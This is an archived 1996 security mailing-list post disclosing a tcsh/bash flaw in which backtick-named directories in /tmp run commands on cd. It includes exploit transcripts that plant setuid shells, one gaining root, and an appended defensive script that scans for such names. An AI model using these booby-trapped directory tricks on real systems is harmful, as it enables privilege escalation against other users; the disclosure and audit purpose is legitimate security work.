From: SMTP%"hartwick@primeline.net" 14-SEP-1996 15:12:22.69
To: EVERHART
Subj: BoS: tee see shell problems

Resent-Date: Sat, 14 Sep 1996 13:51:12 +1000
Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT)
From: "Michael J. Hartwick"
To: test
cc: Multiple recipients of list BUGTRAQ, best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
X-Mailing-List: archive/latest/367
Subject: BoS: tee see shell problems

I just tested a variation of this exploit with bash 1.14.6(1) running on
Linux 2.0.13. By using my variation I managed to become root. I find this
frightening. In my variation I wasn't as subtle; I used a large portion of
the original exploit. Hopefully things like this won't happen, but it is
possible. I know that I will forever be much more careful when cd'ing from
now on. This is a very simplistic example, but I am sure more difficult
ones can be devised.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% cd /tmp/\`source\ .WaReZ\`
jim% echo chmod 4755 `which sh` 2\&\> /dev/null > .WaReZ
jim% chmod +x .WaReZ
jim% cd

---------------------------Cut to unsuspecting foo------------------------

jim# whoami
root
jim# echo $SHELL
/bin/bash
jim# I just like to check that sometimes.
jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim# cd /tmp
jim# ls

`source .WaReZ`

jim# OH BOY!!! the jack pot!
jim# cd *WaReZ*
jim# ls
jim# oh, oh well maybe I'll check later...
jim# cd

----------------------------Cut to More Bad guy--------------------------

jim% bash
#whoami
root
# hah.

---------------------------End Unix Parable-------------------------------

On Fri, 13 Sep 1996, test wrote:

>A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
>out with BSDI anyway.) that allows the execution of arbitrary commands
>when changing into directories that are enclosed with backticks. The
>problem might also prove to be quite bad to tcsh scripts that find
>themselves changing into directories on the fly.
>
>Here is probably one of the dumbest methods possible that could be used to
>exploit this weakness.
>
>----------------------------Cut to Bad guy--------------------------------
>
>jim% whoami
>Evol bad guy
>jim% mkdir /tmp/\`source\ .WaReZ\`
>jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
>jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
>jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
>jim% chmod +x /tmp/*W*/.WaReZ
>
>---------------------------Cut to unsuspecting foo------------------------
>
>jim% whoami
>Unsuspecting foo
>jim% echo $SHELL
>/bin/tcsh
>jim% I just like to check that sometimes.
>jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
>jim% cd /tmp
>jim% ls
>
>`source .WaReZ`
>
>jim% OH BOY!!! the jack pot!
>jim% cd *WaReZ*
>jim% ls
>
>jim% oh, oh well maybe I'll check later...
>jim% cd $HOME
>
>----------------------------Cut to More Bad guy--------------------------
>
>jim% ls -a /tmp/*W*/
>
>.
>..
>.24753
>
>jim% /tmp/*W*/.24753
>$whoami
>unsuspecting foo
>$ hah.
>---------------------------End Unix Parable-------------------------------
>

----------------------------------------------------------------------------
Michael J. Hartwick, VE3SLQ
Hartwick Communications Consulting
hartwick@primeline.net
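As an added defensive example that is not part of Hartwick's post or the quoted report, the POSIX sh audit below lists entries under a directory whose names contain a backtick or "$(", the command-substitution metacharacters both transcripts rely on. The scratch directory names it creates are constructed for the demo, and it assumes only sh, find(1), wc(1) and mktemp(1).

```shell
#!/bin/sh
# Added example (not from the original post): audit a directory tree for
# entry names carrying the command-substitution metacharacters that the
# /tmp/`source .WaReZ` trick depends on. Assumes POSIX sh, find(1), wc(1)
# and mktemp(1); the directory names in the demo are assumptions.

# list_metachar_names DIR: print every path under DIR whose name contains
# a backtick or "$(". printf %s prints the dangerous name literally, so the
# auditing shell never re-evaluates it the way the vulnerable cd did.
list_metachar_names() {
    find "$1" \( -name '*`*' -o -name '*$(*' \) -print |
    while IFS= read -r path; do
        printf 'metachar name: %s\n' "$path"
    done
}

# count_metachar_names DIR: same search, writes the number of hits to stdout.
count_metachar_names() {
    find "$1" \( -name '*`*' -o -name '*$(*' \) -print | wc -l | tr -d ' '
}

# make_demo_tree: build a scratch tree (constructed demo data) with one
# benign directory and one booby-trapped name; prints the tree's root.
make_demo_tree() {
    demo_dir=$(mktemp -d)
    mkdir -p "$demo_dir/plain" "$demo_dir/"'`source .WaReZ`'
    printf '%s\n' "$demo_dir"
}

# Demo run: expect exactly one report, for the backtick-named directory.
root_dir=$(make_demo_tree)
list_metachar_names "$root_dir"
printf 'hits: %s\n' "$(count_metachar_names "$root_dir")"
rm -rf "$root_dir"
```

Run it against /tmp or any world-writable directory to surface names that would have lured the "unsuspecting foo" above.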